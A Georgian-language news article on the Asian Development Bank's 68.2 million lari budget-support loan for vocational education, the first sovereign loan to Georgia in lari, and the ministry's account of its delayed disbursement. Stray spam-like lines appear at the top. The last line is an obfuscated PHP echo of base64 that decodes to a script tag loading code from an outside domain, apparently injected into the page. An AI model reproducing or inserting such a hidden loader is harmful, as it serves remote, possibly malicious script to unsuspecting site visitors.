global distribution
გარე ავეჯი

საქართველომ აზიის განვითარების ბანკისგან (ADB) 68.2 მლნ ლარის ბიუჯეტის მხარდამჭერი სესხი მიიღო პროგრამის ფარგლებში, რომელიც ქვეყანას პროფესიული განათლების გაძლიერებაში დაეხმარება.

ფინანსთა სამინისტროს ინფორმაციით, ეს პირველი შემთხვევაა, როდესაც საერთაშორისო საფინანსო ინსტიტუტმა სუვერენული სესხი ლარში გამოყო.

"პროფესიული განათლების გაუმჯობესების მხარდაჭერის მიზნით, აზიის განვითარების ბანკსა და საქართველოს შორის გაფორმებული სასესხო შეთანხმების („თანამედროვე უნარები უკეთესი დასაქმების სექტორის განვითარების პროგრამისთვის - ქვეპროგრამა 2“) ფარგლებში, აზიის განვითარების ბანკის მხრიდან განხორციელდა ეროვნულ ვალუტაში დენომინირებული პირველი სუვერენული სესხის ჩამორიცხვა - 68.2 მლნ ლარის ოდენობით, რომელიც წარმოადგენს ბიუჯეტის მხარდამჭერ სესხს.

გასათვალისწინებელია, რომ პირველი შემთხვევაა, როდესაც საერთაშორისო საფინანსო ინსტიტუტის მიერ საქართველოსთვის სუვერენული სესხის გამოყოფა განხორციელდა ეროვნულ ვალუტაში, რაც, კიდევ ერთხელ, უსვამს ხაზს ADB-ის და საქართველოს მთავრობის წარმატებულ თანამშრომლობას, არა მხოლოდ, საინვესტიციო პროექტების დაფინანსების, არამედ ასევე, სტრუქტურული რეფორმების მხარდაჭერისა და საჯარო ფინანსების მდგრადი მართვის მიმართულებით.

აღნიშნული პროგრამის ფარგლებში, სესხის ეროვნულ ვალუტაში აღება თანხვედრაშია საქართველოს ვალის მართვის სტრატეგიასთან, რომლის მიზანია, სახელმწიფო ვალში უცხოური და ეროვნული ვალუტის ჯანსაღი პროპორციული განაწილების მიღწევა, რაც აუმჯობესებს ქვეყნის ეკონომიკის მდგრადობას საგარეო შოკების მიმართ და თავის მხრივ, ხელს შეუწყობს ვალის მართვის მდგრადობას.

შინაარსობრივად, პროგრამა მხარს უჭერს საქართველოს განათლების, მეცნიერებისა და ახალგაზრდობის სამინისტროს პროფესიული განათლების ხარისხის გაუმჯობესებაში, პროფესიული განათლების სისტემის ხელმისაწვდომობის, ინკლუზიურობის გაზრდისა და ინსტიტუციური ჩარჩოს გაძლიერებაში",- აღნიშნულია ფინანსთა სამინისტროს მიერ გავრცელებულ ინფორმაციაში.

საქართველოსა და აზიის განვითარების ბანკს შორის შესაბამის სასესხო შეთანხმებას ხელი გასული წლის დეკემბერში მოეწერა. დაფინანსება საქართველოში მიმდინარე ADB-ის პროგრამის — თანამედროვე უნარები უკეთესი დასაქმებისთვის — მეორე ქვეპროგრამაა. ADB-ის თანახმად, 2020 წელს დამტკიცებული პირველი ქვეპროგრამის ფარგლებში გაუმჯობესდა პროფესიულ განათლებაზე წვდომა. ეს განპირობებული იყო პროფესიული სწავლების დაწესებულებებში ჩარიცხვის პროცედურის დახვეწით, ზრდასრულთა განათლების სარეგულაციო ჩარჩოს მიღებითა და პროფესიული განათლების კერძო მომწოდებლებისთვის საბიუჯეტო დაფინანსების მქონე სავაუჩერო პროგრამის შექმნით. გაიზარდა პროფესიული სასწავლებლების მასწავლებლების ხელფასები, განვითარდა “პროფესიული ჰაბების” კონცეფცია და პროფესიული განათლების სისტემაში ჩაეშვა საჯარო-კერძო თანამშრომლობის საპილოტე პროგრამები. გასულ წელს გავრცელებულ პრესრელიზში ADB-ში აღნიშნავდნენ, რომ ქვეპროგრამა 2 ხელს შეუწყობს ისეთი ნაბიჯების გადადგმას, რომელიც დაეხმარება პროფესიული განათლების ხარისხისა და რელევანტურობის გაუმჯობესებას ეკონომიკის პრიორიტეტულ დარგებში, გაზრდის წვდომას პროფესიულ სწავლებაზე და ჩართავს კერძო სექტორს პროფესიული პროგრამებისა და სასწავლო გეგმის რელევანტურობის გაუმჯობესებაში.

ცნობისთვის, ფინანსთა სამინისტროში მათ შორის ADB-ის აღნიშნულ სესხის წლის პირველო ნახევარში არ ჩარიცხვას ასახელებდნენ BMG-სთან საგარეო კრედიტებში ჩამორჩენის მიზეზად. 6 თვეში საქართველოს მთავრობას 796 მილიონი ლარის საგარეო კრედიტები უნდა მიეღო, თუმცა ფაქტობრივმა შესრულებამ მხოლოდ 377 მილიონი ლარი შეადგინა, რაც გეგმის მხოლოდ 47%-ია. შესაბამისად, ვალების ნახევარზე მეტის ჩამორიცხვა არ განხორციელებულა, რაც საგარეო კრედიტების ათვისების მხრივ უკანასკნელ წლებში გეგმასთან ყველაზე დიდი ჩამორჩენაა.

"როგორც მოგეხსენებათ, ბიუჯეტის მხარდამჭერი სესხების ფარგლებში სესხის თანხების ჩამორიცხვა ხორციელდება შეთანხმებული მატრიცის საფუძველზე, შესრულებული ღონისძიებების შესაბამისად. 2025 წლის ბიუჯეტის მხარდამჭერი სესხების ფარგლებში დღეის მდგომარეობით ჩამორიცხულია 74,248,237 ლარი (ჩამორიცხვა განხორციელდა ივლისის დასაწყისში, ნაცვლად ივნისისა) და მიმდინარეობს მუშაობა სხვადასხვა საფინანსო ინსტიტუტებთან წლის ბოლომდე მისაღები საბიუჯეტო დახმარებების ტიპის სესხების ჩამორიცხვის მიზნით გასატარებელ ღონისძიებებზე.

ამასთან, გასათვალისწინებელია, რომ 2024 წლის 2 დეკემბერს საქართველოსა და აზიის განვითარების ბანკს (ADB) შორის გაფორმებული სასესხო შეთანხმება (ჩვეულებრივი ოპერაციები) (თანამედროვე უნარები უკეთესი დასაქმების სექტორის განვითარების პროგრამისთვის - ქვეპროგრამა 2) ფარგლებში წარმოადგენს პირველ სუვერენულ სესხს, რომელიც დენომინირებულია საქართველოს ეროვნულ ვალუტაში, რაც თავის მხრივ საჭიროებს დამატებით პროცედურებს თავად აზიის განვითარების ბანკის მხრიდან. ქართული მხარის მიერ მატრიცის ფარგლებში გათვალისწინებული ვალდებულებები სრულად შესრულებულია სესხის ფარგლებში 68,198,000 ლარის ჩამორიცხვა ამჟამად დამოკიდებულია აზიის განვითარების ბანკის ხაზინის მიერ განსახორციელებელ ღონისძიებებზე, რაც თავის მხრივ დამოკიდებული გლობალურ საერთაშორისო ფინანსურ ბაზრებზე არსებულ გარემოზე. შესაბამისად აღნიშნული სესხის ფარგლებში ჩამორიცხვა მოსალოდნელია წლის მეორე ნახევარში, ნაცვლად წლის პირველი ნახევრისა", - უთხრეს სამინისტროში BMG-ს 7 ივლისს.

111
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");